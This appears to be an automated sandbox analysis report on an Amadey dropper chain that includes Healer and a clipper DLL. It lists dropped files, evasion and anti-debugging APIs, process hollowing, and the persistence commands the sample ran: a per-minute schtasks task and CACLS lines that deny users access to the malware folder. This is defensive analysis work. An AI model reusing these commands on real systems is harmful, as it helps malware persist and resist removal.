                            Source: Binary string: AC:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: wextract.pdb source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.261534340.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000000.400800832.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000003.401064354.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785330986.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000010.00000000.402691693.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000000.409509080.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000002.410333613.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.518871560.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.519216462.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000000.645436147.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000002.646132951.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000000.774022466.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000002.774254315.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.15.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmMg.exe, 00000001.00000003.262236025.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262206496.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262109812.000000000479D000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000E.00000000.368083215.0000000000A02000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.785642751.000000006F69F000.00000002.00000001.01000000.0000000D.sdmp, clip64.dll.16.dr, clip64[1].dll.16.dr
                            Source: Binary string: Healer.pdbH5 source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeUnpacked PE file: 2.2.amMl.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeUnpacked PE file: 2.2.amMl.exe.400000.0.unpack .text:ER;.data:W;.gus:R;.dux:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D724D push ecx; ret 0_2_011D7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F8724D push ecx; ret 1_2_00F87260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005CC125 push ebx; ret 2_2_005CC126
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BE484 push ecx; ret 2_2_005BE497
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005CBE73 push cs; iretd 2_2_005CBF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005CBF75 push cs; iretd 2_2_005CBF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_02394139 push edi; iretd 2_2_0239414E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0239454E push ecx; retf 2_2_02394554
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011DF748 push E8FFFFFBh; iretd 15_2_011DF74D
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: amMl.exe.1.drStatic PE information: section name: .gus
                            Source: amMl.exe.1.drStatic PE information: section name: .dux

                            Persistence and Installation Behavior

                            barindex
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 4184, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_011D1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F81AE8

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep count: 128 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep time: -3840000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4604Thread sleep time: -50000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3216Thread sleep count: 38 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3216Thread sleep time: -6840000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 2956Thread sleep count: 164 > 30
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 2956Thread sleep time: -164000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-25915
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-26002
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 5.1 %
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeAPI call chain: ExitProcess graph end nodegraph_2-26004
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_011D5467
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_011D2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EFC58 FindFirstFileExW,15_2_011EFC58
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B092B mov eax, dword ptr fs:[00000030h]2_2_005B092B
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B0D90 mov eax, dword ptr fs:[00000030h]2_2_005B0D90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EA9A1 mov eax, dword ptr fs:[00000030h]15_2_011EA9A1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011ECFB2 mov eax, dword ptr fs:[00000030h]15_2_011ECFB2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6F40 SetUnhandledExceptionFilter,0_2_011D6F40
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_011D6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F86F40 SetUnhandledExceptionFilter,1_2_00F86F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F86CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005BD070
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005BE883
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005C71D1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C2658 SetUnhandledExceptionFilter,2_2_005C2658
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_011E790F
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_011EBB20
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_011E7208

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011D3740 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,15_2_011D3740
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
